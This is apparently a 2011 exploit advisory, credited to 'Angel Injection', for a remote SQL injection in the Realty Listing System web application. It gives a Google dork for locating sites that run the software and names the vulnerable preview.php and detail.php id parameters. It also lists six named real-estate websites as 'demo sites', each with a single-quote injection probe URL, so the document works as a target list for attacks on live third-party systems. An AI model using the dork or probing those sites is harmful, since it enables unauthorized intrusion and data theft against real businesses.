Realty Listing System suffers from a remote SQL injection vulnerability.
199690c0dda3a1454d5e265162463fb84a02e38f2de27c4ca0813bdd2adf4eee
# Exploit Title:Realty Listing System sql Injection Vulnerability
# Date: 8/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link: http://www.realtylistingsystem.com/
# Version: N/A
# Category:: webapps
# Google dork:intext:"Website powered by the Realty Listing System." inurl:preview.php?id=
# 0r intext:"Website powered by the Realty Listing System." inurl:detail.php?id=
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit In File
preview.php?id=
detail.php?id=
Demo Site
http://www.bundyinc.com/preview.php?id=1%27
http://clockworkrealty.com/preview.php?id=1%27
http://www.smithrealtyonline.com/preview.php?id=1%27
http://www.kenkoprealty.com/preview.php?id=1%27
http://www.zoellerag.com/preview.php?id=1%27
http://www.timandjim.com/preview.php?id=1%27
exploit
http://target/[path]/preview.php?id=1
0r
http://target/[path]/detail.php?id=1
Demo
http://target/[path]/detail.php?id=1 Injection Here
http://target/[path]/preview.php?id=1 Injection Here
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team